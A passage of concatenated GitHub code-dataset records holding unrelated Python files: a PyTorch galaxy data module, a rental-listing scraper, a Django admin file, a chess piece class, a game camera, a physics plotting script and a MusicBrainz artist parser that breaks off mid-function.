self.crop_ratio_bounds = crop_ratio_bounds\n self.greyscale = greyscale\n self.custom_albumentation_transform = None\n\n logging.info('Using albumentations for augmentations')\n self.transform_with_album()\n\n def transform_with_torchvision(self):\n raise NotImplementedError('Deprecated in favor of albumentations')\n\n def transform_with_album(self):\n\n if self.custom_albumentation_transform is not None:\n # should be a Compose() object, TODO assert\n transforms_to_apply = self.custom_albumentation_transform\n else:\n # gives a transforms = Compose() object\n transforms_to_apply = default_transforms(\n crop_scale_bounds=self.crop_scale_bounds,\n crop_ratio_bounds=self.crop_ratio_bounds,\n resize_after_crop=self.resize_after_crop,\n pytorch_greyscale=self.greyscale\n )\n \n # applies that transforms object\n # albumentations expects np array, and returns dict keyed by \"image\"\n # transpose changes from BHWC (numpy/TF style) to BCHW (torch style) \n # cannot use a lambda or define here because must be pickleable for multi-gpu\n self.transform = partial(do_transform, transforms_to_apply=transforms_to_apply)\n\n # only called on main process\n def prepare_data(self):\n pass # could include some basic checks\n\n # called on every gpu\n\n def setup(self, stage: Optional[str] = None):\n\n self.specify_catalogs(stage)\n\n # Assign train/val datasets for use in dataloaders\n # assumes dataset_class has these standard args\n if stage == \"fit\" or stage is None:\n self.train_dataset = galaxy_dataset.GalaxyDataset(\n catalog=self.train_catalog, label_cols=self.label_cols, transform=self.transform\n )\n self.val_dataset = galaxy_dataset.GalaxyDataset(\n catalog=self.val_catalog, label_cols=self.label_cols, transform=self.transform\n )\n\n # Assign test dataset for use in dataloader(s)\n if stage == \"test\" or stage is None:\n self.test_dataset = galaxy_dataset.GalaxyDataset(\n catalog=self.test_catalog, label_cols=self.label_cols, transform=self.transform\n )\n\n if stage == 'predict': # not set up by default with stage=None, only if explicitly requested\n if self.predict_catalog is None:\n raise ValueError('Attempting to predict, but GalaxyDataModule was init without a predict_catalog arg. init with GalaxyDataModule(predict_catalog=some_catalog, ...)')\n self.predict_dataset = galaxy_dataset.GalaxyDataset(\n catalog=self.predict_catalog, label_cols=self.label_cols, transform=self.transform\n )\n\n def train_dataloader(self):\n return DataLoader(self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, pin_memory=True, persistent_workers=self.num_workers > 0, prefetch_factor=self.prefetch_factor, timeout=self.dataloader_timeout)\n\n def val_dataloader(self):\n return DataLoader(self.val_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, pin_memory=True, persistent_workers=self.num_workers > 0, prefetch_factor=self.prefetch_factor, timeout=self.dataloader_timeout)\n\n def test_dataloader(self):\n return DataLoader(self.test_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, pin_memory=True, persistent_workers=self.num_workers > 0, prefetch_factor=self.prefetch_factor, timeout=self.dataloader_timeout)\n\n def predict_dataloader(self):\n return DataLoader(self.predict_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, pin_memory=True, persistent_workers=self.num_workers > 0, prefetch_factor=self.prefetch_factor, timeout=self.dataloader_timeout)\n\n def specify_catalogs(self, stage):\n if self.catalog is not None:\n # will split the catalog into train, val, test here\n self.train_catalog, hidden_catalog = train_test_split(\n self.catalog, train_size=self.train_fraction, random_state=self.seed\n )\n self.val_catalog, self.test_catalog = train_test_split(\n hidden_catalog, train_size=self.val_fraction/(self.val_fraction + self.test_fraction), random_state=self.seed\n )\n del hidden_catalog\n else:\n # assume you have passed pre-split catalogs\n # (maybe not all, e.g. only a test catalog, or only train/val catalogs)\n if stage == 'predict':\n assert self.predict_catalog is not None\n elif stage == 'test':\n # only need test\n assert self.test_catalog is not None\n elif stage == 'fit':\n # only need train and val\n assert self.train_catalog is not None\n assert self.val_catalog is not None\n else:\n # need all three (predict is still optional)\n assert self.train_catalog is not None\n assert self.val_catalog is not None\n assert self.test_catalog is not None\n # (could write this shorter but this is clearest)\n\ndef default_torchvision_transforms(greyscale, resize_size, crop_scale_bounds, crop_ratio_bounds):\n # refactored out for use elsewhere, if need exactly these transforms\n # assume input is 0-255 uint8 tensor\n\n # automatically normalises from 0-255 int to 0-1 float\n transforms_to_apply = [transforms.ToTensor()] # dataset gives PIL image currently\n\n if greyscale:\n # transforms.Grayscale() adds perceptual weighting to rgb channels\n transforms_to_apply += [GrayscaleUnweighted()]\n\n transforms_to_apply += [\n transforms.RandomResizedCrop(\n size=resize_size, # assumed square\n scale=crop_scale_bounds, # crop factor\n ratio=crop_ratio_bounds, # crop aspect ratio\n interpolation=transforms.InterpolationMode.BILINEAR), # new aspect ratio\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(\n degrees=180., interpolation=transforms.InterpolationMode.BILINEAR)\n ]\n \n return transforms_to_apply\n\ndef do_transform(img, transforms_to_apply):\n return np.transpose(transforms_to_apply(image=np.array(img))[\"image\"], axes=[2, 0, 1]).astype(np.float32)\n\n# torchvision\nclass GrayscaleUnweighted(torch.nn.Module):\n\n def __init__(self, num_output_channels=1):\n super().__init__()\n self.num_output_channels = num_output_channels\n\n def forward(self, img):\n \"\"\"\n PyTorch (and tensorflow) does greyscale conversion as a *weighted* mean by default (as colours have different perceptual brightnesses).\n Here, do a simple mean.\n Args:\n img (Tensor): Image to be converted to grayscale.\n\n Returns:\n Tensor: Grayscaled image.\n \"\"\"\n # https://pytorch.org/docs/stable/generated/torch.mean.html\n return img.mean(dim=-3, keepdim=True) # (..., C, H, W) convention\n\n def __repr__(self):\n return self.__class__.__name__ + '(num_output_channels={0})'.format(self.num_output_channels)\n\n\n","repo_name":"mwalmsley/galaxy-datasets","sub_path":"galaxy_datasets/pytorch/galaxy_datamodule.py","file_name":"galaxy_datamodule.py","file_ext":"py","file_size_in_byte":10782,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"26071438124","text":"# last digit is the remainder when we %10 and to remove that digit from number /10\ndef rev_integer(n):\n\treversed=0\n\tremainder=0\n\twhile n>0:\n\t\tremainder=n%10\n\t\tn=n/10\n\t\treversed=reversed*10+remainder\n\treturn reversed\n\nif __name__==\"__main__\":\n\tprint(rev_integer(3461))","repo_name":"sayalighaisas/datastructures-algos","sub_path":"reverse_integer.py","file_name":"reverse_integer.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12464885439","text":"from django.contrib import admin\n\nfrom .models import Subscription, User\n\n\n@admin.register(User)\nclass UserAdmin(admin.ModelAdmin):\n fieldsets = (\n (None, {\n 'fields': [('email', 'first_name'), ('username', 'last_name')]\n }),\n ('Права доступа', {\n 'classes': ('collapse',),\n 'fields': [('is_staff', 'is_superuser')],\n }),\n )\n list_display = ('id', 'email', 'username', 'first_name', 'last_name')\n list_display_links = ('id', 'email', 'username')\n search_fields = ('email', 'username')\n list_filter = ('email', 'username')\n\n\nadmin.site.register(Subscription)\n","repo_name":"Andrey11995/foodgram-project-react","sub_path":"backend/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32414614140","text":"# -*- coding: utf-8 -*-\r\n'''\r\n@author: Yalei Meng E-mail: yaleimeng@sina.com\r\n@license: (C) Copyright 2017, HUST Corporation Limited.\r\n@desc:爬取某城市小猪短租的前300多条房源的基本信息。主要是描述、地址、价位,房屋图片链接,房东网名、照片、性别;\r\n并写入csv表格。如果需要其他信息请根据实际需要修改。\r\n@DateTime: Created on 2017/9/4,at 19:36\r\n'''\r\nfrom bs4 import BeautifulSoup\r\nimport requests as rq\r\nimport time\r\nimport csv\r\n\r\n #从首页出发。目标是分析300个链接。根据数字规律构造网址的列表。\r\nsite =['http://gz.xiaozhu.com/search-duanzufang-p{}-0/'.format(str(i)) for i in range(1,15)]\r\nua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3192.0 Safari/537.36'\r\nhead = {'User-Agent':ua}\r\n\r\nnewUrls=set()\r\ncsvRows = []\r\n# def updatePage(soup):\r\n# pages = soup.find_all('a',target='_self') #从页脚获得新的页面链接。\r\n# for page in pages: #只把全新的页面加入到新页面集合。\r\n# if page['href'] not in newPages and page['href'] not in oldPages:\r\n# newPages.add(page['href'])\r\n# print(newPages)\r\n\r\ndef getAllurls(web):\r\n r = rq.get(web, headers=head)\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n out = soup.find('ul', class_='pic_list clearfix').find_all('li') # 这里是需要访问的单个元素网页。\r\n for var in out:\r\n url = var.find('a')['href']\r\n if url not in newUrls:\r\n newUrls.add(url)\r\n print(url)\r\n\r\ndef dealPage(myPage):\r\n r = rq.get(myPage)\r\n soup = BeautifulSoup(r.text, 'lxml')\r\n #print(soup)\r\n if soup.find('div', class_='member_pic').find('div')['class'] == ['member_ico1']:\r\n gender = 'female'\r\n else:\r\n gender = 'male'\r\n data ={\r\n 'title' :soup.find('div',{'class':'pho_info'}).find('em').text,\r\n 'address':soup.find('div',class_='con_l').find('p')['title'],\r\n 'roomPic':soup.find('div',class_='pho_show_big').find('img')['src'],\r\n 'price':soup.find('div',class_='day_l').find('span').text,\r\n 'owner':soup.find('div',class_='w_240').find('a')['title'],\r\n 'gender': gender,\r\n 'ownerPic': soup.find('div', class_='member_pic').find('a')['href'],\r\n }\r\n csvRows.append(data)\r\n print(data)\r\n\r\nfor st in site: #从site每个页面分别请求,并添加url到newUrls。300个为止。\r\n getAllurls(st)\r\n time.sleep(1.5)\r\n if len(newUrls)>=300:\r\n break\r\n\r\nfor eve in newUrls: #针对newUrls里面每个url,做详情页的爬取。\r\n dealPage(eve)\r\n time.sleep(1.5)\r\n\r\n#把词典数据写入到csv文件。\r\nprint('字典列表的个数为%d'%len(csvRows))\r\nrowHeader = ['title','address','roomPic','price','owner','gender','ownerPic']\r\nwith open('E:/romm.csv','w',encoding='utf-8')as f:\r\n f_csv = csv.DictWriter(f,rowHeader)\r\n f_csv.writeheader()\r\n f_csv.writerows(csvRows)\r\n","repo_name":"yaleimeng/spider_for_XiaoZhu","sub_path":"smallPig.py","file_name":"smallPig.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31093977551","text":"# -*- coding: utf-8 -*-\n#\n# POC for Glances 3 (Core)\n#\n# Nicolargo (08/2017)\n#\n# Three main threads will be run by the core:\n# - Update the stats (thanks to the Stats class). Each plugin will be running\n# in another thread.\n# - (optionnaly) Display the stats (thanks to the Outputs class)\n# - (optionnaly) Export the stats (thanks to the Exports class)\n\nimport signal\nimport threading\nfrom plugin import Plugin\n\n\nclass TestPlugin(Plugin):\n pass\n\n\nclass Stats(object):\n\n def __init__(self):\n # Dict of plugins\n # key: Plugin name\n # value: Plugin instance\n self.plugins = {}\n\n # Init the plugins\n for i in range(1, 10):\n pname = 'plugin%s' % (i - 1)\n self.plugins[pname] = TestPlugin(name=pname)\n\n def loop(self):\n update_thread = threading.Thread(name=\"update\",\n target=self.update)\n export_thread = threading.Thread(name=\"export\",\n target=self.export)\n display_thread = threading.Thread(name=\"display\",\n target=self.display)\n\n update_thread.start()\n export_thread.start()\n display_thread.start()\n\n def update(self, timeout=3):\n # Init the threads list\n plugin_threads = []\n for pname, p in self.plugins.iteritems():\n t = threading.Thread(name=pname,\n target=p.update,\n args=('ITEM',))\n plugin_threads.append(t)\n\n # Start all the threads\n for p in plugin_threads:\n p.start()\n\n # Wait the end of the threads\n for p in plugin_threads:\n p.join(timeout=timeout)\n if p.isAlive():\n # Process is still running\n # Kill it\n self.kill(p.name)\n p.join()\n\n def export(self, timeout=3):\n for pname, p in self.plugins.iteritems():\n p.export()\n\n def display(self, refresh=3):\n for pname, p in self.plugins.iteritems():\n p.display()\n\n def kill(self, thread_name):\n self.plugins[thread_name].stop()\n\n def stop(self, signal, frame):\n for p in self.plugins:\n p.stop()\n\n\ndef main():\n s = Stats()\n signal.signal(signal.SIGINT, s.stop)\n s.loop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nicolargo/pythonarena","sub_path":"glancesarena/glances3/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"71343045585","text":"import re\n\nimport write_read_file\n\n\ndef change_base(base_name, last_name):\n change_list = []\n file = write_read_file.write_read_base(base_name, 'r')\n for line in file:\n if line.find(last_name) == -1:\n change_list.append(line.strip())\n return change_list\n\n\ndef replace_base(base_name, last_name):\n change_list = []\n file = write_read_file.write_read_base(base_name, 'r')\n try:\n for line in file:\n if line.find(last_name) != -1:\n print(line.strip())\n pattern = input(\"Введите данные которые нужно заменить\\n: \").title()\n line_change = input(\"Введите на что нужно поменять\\n: \").title()\n new_line = line.strip().replace(pattern, line_change)\n change_list.append(new_line)\n else:\n change_list.append(line.strip())\n return change_list\n except ValueError:\n pass\n\n\ndef employee_search(base_name, last_name):\n change_list = []\n file = write_read_file.write_read_base(base_name, 'r')\n for line in file:\n if line.find(last_name) != -1:\n change_list.append(line.strip())\n return change_list\n","repo_name":"Kvezac/homework21","sub_path":"lesson21_homework/python/sort_change_file.py","file_name":"sort_change_file.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6108905080","text":"######\n# segmentation task\n######\n\n@torch.no_grad()\ndef valid_one_epoch(model, dataloader, device, epoch):\n model.eval()\n \n dataset_size = 0\n running_loss = 0.0\n \n val_scores = []\n \n pbar = tqdm(enumerate(dataloader), total=len(dataloader), desc='Valid ')\n for step, (images, masks) in pbar: \n images = images.to(device, dtype=torch.float)\n masks = masks.to(device, dtype=torch.float)\n \n batch_size = images.size(0)\n \n y_pred = model(images)\n loss = criterion(y_pred, masks)\n \n running_loss += (loss.item() * batch_size)\n dataset_size += batch_size\n \n epoch_loss = running_loss / dataset_size\n \n y_pred = nn.Sigmoid()(y_pred)\n val_dice = dice_coef(masks, y_pred).cpu().detach().numpy()\n val_jaccard = iou_coef(masks, y_pred).cpu().detach().numpy()\n val_scores.append([val_dice, val_jaccard])\n \n mem = torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0\n current_lr = optimizer.param_groups[0]['lr']\n pbar.set_postfix(valid_loss=f'{epoch_loss:0.4f}',\n lr=f'{current_lr:0.5f}',\n gpu_memory=f'{mem:0.2f} GB')\n val_scores = np.mean(val_scores, axis=0)\n torch.cuda.empty_cache()\n gc.collect()\n \n return epoch_loss, val_scores","repo_name":"naoki901373/ML-Template","sub_path":"valid/valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36759849088","text":"from Pieces.piece import Piece\nfrom Pieces.empty import Empty\nfrom Pieces.rook import Rook\n\n\nclass King(Piece):\n \"\"\"King piece\"\"\"\n\n def __init__(self):\n \"\"\"Initialize piece attributes\"\"\"\n super().__init__()\n self.display = 'K'\n self.has_moved = False\n \n def check_position(self, board, player, p1):\n \"\"\"Returns '1' if position is valid.\"\"\"\n \n possible_positions = []\n\n for count in range(0, 8):\n # Reset row and col\n row = self.get_position()[0]\n col = self.get_position()[1]\n\n # Check top\n if count == 0:\n row = row - 1\n\n # Check right\n elif count == 1:\n col = col + 1\n\n # Check left\n elif count == 2:\n col = col - 1\n\n # Check bottom\n elif count == 3:\n row = row + 1\n\n # Check top-left\n elif count == 4:\n row = row - 1\n col = col - 1\n\n # Check top-right\n elif count == 5:\n row = row - 1\n col = col + 1\n\n # Check bottom-left\n elif count == 6:\n row = row + 1\n col = col - 1\n\n # Check bottom-right\n elif count == 7:\n row = row + 1\n col = col + 1\n\n try:\n if row >= 0:\n board_pos = board.board[row][col]\n\n # Check if new position is empty or held by enemy\n if isinstance(board_pos['piece'], Empty) or board_pos['piece']['piece'].get_color() != self.get_color():\n possible_positions.append(board_pos)\n except:\n continue\n\n # King & Rook swap\n if not self.has_moved:\n row = self.get_position()[0]\n col = self.get_position()[1]\n board_pos = board.board[row]\n\n # Right\n if isinstance(board_pos[col + 1]['piece'], Empty) and isinstance(board_pos[col + 2]['piece'], Empty):\n if isinstance(board_pos[col + 3]['piece']['piece'], Rook) and board_pos[col + 3]['piece']['piece'].has_moved == False:\n col = col + 2\n board_pos = board.board[row][col]\n possible_positions.append(board_pos)\n\n # Left\n board_pos = board.board[row]\n if isinstance(board_pos[col - 1]['piece'], Empty) and isinstance(board_pos[col - 2]['piece'], Empty) and isinstance(board_pos[col - 3]['piece'], Empty):\n if isinstance(board_pos[col - 4]['piece']['piece'], Rook) and board_pos[col - 4]['piece']['piece'].has_moved == False:\n col = col - 2\n board_pos = board.board[row][col]\n possible_positions.append(board_pos)\n\n return possible_positions","repo_name":"omnz/Chess","sub_path":"Pieces/king.py","file_name":"king.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33707377111","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nq = 1.6e-19\n\nE = np.arange(10*1000*q,60*1000*q,q/10)\ndef bremsstrahlung_cross_section(E,E_e, Z):\n alpha = 1/137\n dsigma_dE = (4*np.pi*alpha**2*Z**2)/E * ((E+E_e)/E_e) * ((E/E_e) + (E_e/E) - 1 + np.log(E_e/E))\n return dsigma_dE\n\n# B = bremsstrahlung_cross_section(E,max(E),11)\n# plt.plot(E,B)\n# plt.show()\n\n\n\n\n\ndata = pd.read_csv(r\"X-Ray\\Data\\16-01-2023\\NaCl Full Data.csv\",skiprows=0)\nprint(data)\n\n\nangle = data['angle']\nwav = data['wav / pm']\nenergy = np.sort(data['E / keV'])\ncount_0 = data['R_0 / 1/s']\n\n\nE_B = bremsstrahlung_cross_section(energy,max(energy),11)\nplt.plot(energy,E_B*max(count_0))\nplt.plot(energy,count_0)\nplt.show()\n\n\n\n\n\n\n","repo_name":"Jacob-J-E/Y3Lab","sub_path":"X-Ray Crystal Diffraction/X-Ray/Session_4_19_01_2023/bremsstrahlung.py","file_name":"bremsstrahlung.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29417824960","text":"import pygame\nvec = pygame.math.Vector2\nfrom .player import Player\nfrom .constants import GameConstants\nclass Camera:\n def __init__(self,player :Player):\n self.player = player\n self.x = 0\n self.y = 0\n self.width = GameConstants.BACKGROUNWIDTH\n def scroll(self):\n x_camera = self.player.rect.x - (GameConstants.GAMEWIDTH/2 - self.player.rect.w/2)\n if x_camera < 0:\n x_camera = 0\n if x_camera + GameConstants.GAMEWIDTH > self.width:\n x_camera = self.width - GameConstants.GAMEWIDTH\n self.x = -x_camera\n ","repo_name":"c0ngthanh/RPGGame","sub_path":"filegame/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21022152187","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 23 10:14:07 2018\n\n@author: Sc\n\"\"\"\n\nimport sys\nimport re\n\nif len(sys.argv) > 1:\n f = open(sys.argv[1], \"rU\",encoding='utf-8') \nelse:\n f = open(\"wc.py\",\"rU\",encoding='utf-8')\n #f = sys.stdin\n \ncodelinenum = 1 \nfor line in f.readlines():\n if (re.match(r'^ *\\n',line) or line.startswith('#')):\n print(line,file=sys.stdout, end='')\n #elif(re.match(r\"(^ *\"\"\")|(^ *''')\"):\n else:\n print(codelinenum,line,file=sys.stdout, end='')\n codelinenum = codelinenum + 1\n \nf.close()\n\n\n\n\n","repo_name":"0oSco0/systemprogram","sub_path":"kadai1/nl.py","file_name":"nl.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43417852017","text":"\r\n# 0.5 씩 좌우로 간격을 둬야 한다.\r\n# 그럼 L 만큼 커버가 가능한거네\r\n\r\nfrom collections import deque\r\nN, L = map(int, input().split())\r\nlocation = list(map(int, input().split()))\r\n\r\nlocation.sort()\r\nlocation = deque(location)\r\n# print(location)\r\nstart = location.popleft()\r\ncnt = 1\r\nwhile len(location) != 0:\r\n node = location.popleft()\r\n if start + L - 1 < node:\r\n start = node\r\n cnt += 1\r\nprint(cnt)\r\n","repo_name":"Guitarboyjason/Algorithm","sub_path":"백준/Silver/1449. 수리공 항승/수리공 항승.py","file_name":"수리공 항승.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11002235742","text":"from ioUtils import getFile\nfrom fsUtils import isFile\nfrom webUtils import getHTML, isBS4\nfrom strUtils import fixName\nfrom math import ceil, floor\nfrom hashlib import md5\n\nfrom dbBase import dbBase\n\nclass artistMBIDClass:\n def __init__(self, ID=None, err=None):\n self.ID=ID\n self.err=err\n \n def get(self):\n return self.__dict__\n \n \nclass artistMBURLClass:\n def __init__(self, url=None, err=None):\n self.url = url\n self.err = err\n \n def get(self):\n return self.__dict__\n \n \nclass artistMBNameClass:\n def __init__(self, name=None, err=None):\n self.name = name\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBMediaClass:\n def __init__(self, err=None):\n self.media = {}\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBMediaDataClass:\n def __init__(self, album=None, url=None, aclass=None, aformat=None, artist=None, code=None, year=None, err=None):\n self.album = album\n self.url = url\n self.aclass = aclass\n self.aformat = aformat\n self.artist = artist\n self.code = code\n self.year = year\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBMediaAlbumClass:\n def __init__(self, url=None, album=None, aformat=None, err=None):\n self.url = url\n self.album = album\n self.aformat = aformat\n self.err = err \n \n def get(self):\n return self.__dict__\n\n \nclass artistMBMediaCountsClass:\n def __init__(self, err=None):\n self.counts = {}\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBPageClass:\n def __init__(self, ppp = None, tot = None, more=None, redo=None, err=None):\n self.ppp = ppp\n self.tot = tot\n if isinstance(ppp, int) and isinstance(tot, int):\n self.pages = int(ceil(tot/ppp))\n else:\n self.pages = None\n\n self.err = err\n\n self.more = more\n self.redo = redo\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBProfileClass:\n def __init__(self, profile=None, aliases=None, members=None, sites=None, groups=None, variations=None, err=None):\n self.profile = profile\n self.aliases = aliases\n self.members = members\n self.sites = sites\n self.groups = groups\n self.variations = variations\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBURLInfo:\n def __init__(self, name=None, url=None, ID=None, err=None):\n self.name = name\n self.url = url\n self.ID = ID\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBDataClass:\n def __init__(self, artist=None, url=None, ID=None, pages=None, profile=None, media=None, mediaCounts=None, err=None):\n self.artist = artist\n self.url = url\n self.ID = ID\n self.pages = pages\n self.profile = profile\n self.media = media\n self.mediaCounts = mediaCounts\n self.err = err\n \n def get(self):\n return self.__dict__\n \n \n def show(self):\n print(\"MusicBrainz Artist Data Class\")\n print(\"-------------------------\")\n print(\"Artist: {0}\".format(self.artist.name))\n print(\"URL: {0}\".format(self.url.url))\n print(\"ID: {0}\".format(self.ID.ID))\n print(\"Pages: {0}\".format(self.pages.get()))\n print(\"Media: {0}\".format(self.mediaCounts.get()))\n for mediaType,mediaTypeAlbums in self.media.media.items():\n print(\" {0}\".format(mediaType))\n for album in mediaTypeAlbums:\n print(\" {0}\".format(album.album)) \n \n def get(self):\n return self.__dict__\n\n\n \nclass artistMB(dbBase):\n def __init__(self, debug=False):\n self.debug = debug\n \n def getData(self, inputdata):\n if isinstance(inputdata, str):\n if isFile(inputdata):\n try:\n bsdata = getHTML(getFile(inputdata))\n except:\n try:\n bsdata = getHTML(getFile(inputdata, version=2))\n except:\n raise ValueError(\"Cannot read artist file: {0}\".format(inputdata))\n else:\n try:\n bsdata = getHTML(inputdata)\n except:\n raise ValueError(\"Not sure about string input: {0} . It is not a file\".format(inputdata))\n elif isBS4(inputdata):\n bsdata = inputdata\n pass\n else:\n raise ValueError(\"Not sure about input type: {0}\".format(type(inputdata)))\n\n self.bsdata = bsdata\n \n return self.parse()\n \n \n \n \n def getNamesAndURLs(self, content):\n data = []\n if content is not None:\n for ref in content.findAll(\"a\"):\n url = ref.attrs['href']\n name = ref.text\n\n ID = None\n data.append(artistMBURLInfo(name=name, url=url, ID=ID))\n return data\n\n\n\n\n\n #######################################################################################################################################\n ## Artist URL\n #######################################################################################################################################\n def getartistMBURL(self):\n artistData = self.bsdata.find(\"div\", {\"class\": \"artistheader\"})\n if artistData is None:\n auc = artistMBURLClass(err=True)\n return auc\n \n h1 = artistData.find(\"h1\")\n if h1 is None:\n auc = artistMBURLClass(err=\"NoH1\")\n \n ref = self.getNamesAndURLs(h1)\n try:\n artistURL = ref[0].url\n auc = artistMBURLClass(url=artistURL, err=None)\n except:\n auc = artistMBURLClass(err=\"TxtErr\")\n\n return auc\n\n \n\n #######################################################################################################################################\n ## Artist ID\n ####################################################################################################################################### \n def getartistMBDiscID(self, suburl):\n ival = \"/artist\"\n if isinstance(suburl, artistMBURLClass):\n suburl = suburl.url\n if not isinstance(suburl, str):\n aic = artistMBIDClass(err=\"NotStr\") \n return aic\n\n pos = suburl.find(ival)\n if pos == -1:\n aic = artistMBIDClass(err=\"NotArtist\") \n return aic\n\n uuid = suburl[pos+len(ival)+1:]\n\n \n m = md5()\n for val in uuid.split(\"-\"):\n m.update(val.encode('utf-8'))\n hashval = m.hexdigest()\n discID = str(int(hashval, 16))\n \n try:\n int(discID)\n except:\n aic = artistMBIDClass(err=\"NotInt\") \n return aic\n\n aic = artistMBIDClass(ID=discID)\n return aic\n \n \n\n #######################################################################################################################################\n ## Artist Name\n #######################################################################################################################################\n def getartistMBName(self):\n artistData = self.bsdata.find(\"div\", {\"class\": \"artistheader\"})\n if artistData is None:\n anc = artistMBNameClass(err=True)\n return anc\n \n h1 = artistData.find(\"h1\")\n if h1 is None:\n anc = artistMBNameClass(err=\"NoH1\")\n \n ref = self.getNamesAndURLs(h1)\n try:\n artistName = ref[0].name\n anc = artistMBNameClass(name=artistName, err=None)\n except:\n anc = artistMBNameClass(err=\"TxtErr\")\n \n return anc\n \n \n\n #######################################################################################################################################\n ## Artist Media\n #######################################################################################################################################\n def getartistMBMediaAlbum(self, td):\n amac = artistMBMediaAlbumClass()\n for span in td.findAll(\"span\"):\n attrs = span.attrs\n if attrs.get(\"class\"):\n if 'format' in attrs[\"class\"]:\n albumformat = span.text\n albumformat = albumformat.replace(\"(\", \"\")\n albumformat = albumformat.replace(\")\", \"\")\n amac.format = albumformat\n continue\n span.replaceWith(\"\")\n\n ref = td.find(\"a\")\n if ref:\n amac.url = ref.attrs['href']\n amac.album = ref.text\n else:\n amac.err = \"NoText\"\n\n return amac\n \n \n def getartistMBMedia(self):\n amc = artistMBMediaClass()\n \n \n mediaTypes = [x.text for x in self.bsdata.findAll(\"h3\")]\n tables = dict(zip(mediaTypes, self.bsdata.findAll(\"table\")))\n\n for mediaType, table in tables.items():\n headers = [x.text for x in table.findAll(\"th\")]\n trs = table.findAll('tr')\n for tr in trs[1:]:\n tds = tr.findAll(\"td\")\n\n ## Year\n idx = headers.index(\"Year\")\n year = tds[idx].text\n\n ## Title\n idx = headers.index(\"Title\")\n refs = [x.attrs['href'] for x in tds[idx].findAll('a')]\n if len(refs) == 0:\n raise ValueError(\"No link for album\")\n url = refs[0]\n album = tds[idx].text\n\n \n m = md5()\n uuid = url.split(\"/\")[-1]\n for val in uuid.split(\"-\"):\n m.update(val.encode('utf-8'))\n hashval = m.hexdigest()\n code = int(hashval, 16)\n \n\n ## Artist\n idx = headers.index(\"Artist\")\n artists = []\n for artistVal in tds[idx].findAll('a'):\n url = artistVal.attrs['href']\n name = artistVal.text\n m = md5()\n uuid = url.split(\"/\")[-1]\n for val in uuid.split(\"-\"):\n m.update(val.encode('utf-8'))\n hashval = m.hexdigest()\n ID = int(hashval, 16)\n artists.append(artistMBURLInfo(name=name, url=url, ID=ID))\n \n\n amdc = artistMBMediaDataClass(album=album, url=url, aclass=None, aformat=None, artist=artists, code=code, year=year)\n if amc.media.get(mediaType) is None:\n amc.media[mediaType] = []\n amc.media[mediaType].append(amdc)\n\n \n \n\n return amc\n \n \n\n #######################################################################################################################################\n ## Artist Media Counts\n ####################################################################################################################################### \n def getartistMBMediaCounts(self, media):\n \n amcc = artistMBMediaCountsClass()\n \n credittype = \"Releases\"\n if amcc.counts.get(credittype) == None:\n amcc.counts[credittype] = {}\n for creditsubtype in media.media.keys():\n amcc.counts[credittype][creditsubtype] = int(len(media.media[creditsubtype]))\n \n return amcc\n \n \n amcc.err = \"No Counts\"\n return amcc\n \n results = self.bsdata.findAll(\"ul\", {\"class\": \"facets_nav\"})\n if results is None or len(results) == 0:\n amcc.err = \"No Counts\"\n return amcc\n \n for result in results:\n for li in result.findAll(\"li\"):\n ref = li.find(\"a\")\n if ref:\n attrs = ref.attrs\n span = ref.find(\"span\", {\"class\": \"facet_count\"})\n count = None\n if span:\n count = span.text\n credittype = attrs.get(\"data-credit-type\")\n creditsubtype = attrs.get(\"data-credit-subtype\")\n if credittype and creditsubtype:\n if amcc.counts.get(credittype) == None:\n amcc.counts[credittype] = {}\n if amcc.counts[credittype].get(creditsubtype) == None:\n try:\n amcc.counts[credittype][creditsubtype] = int(count)\n 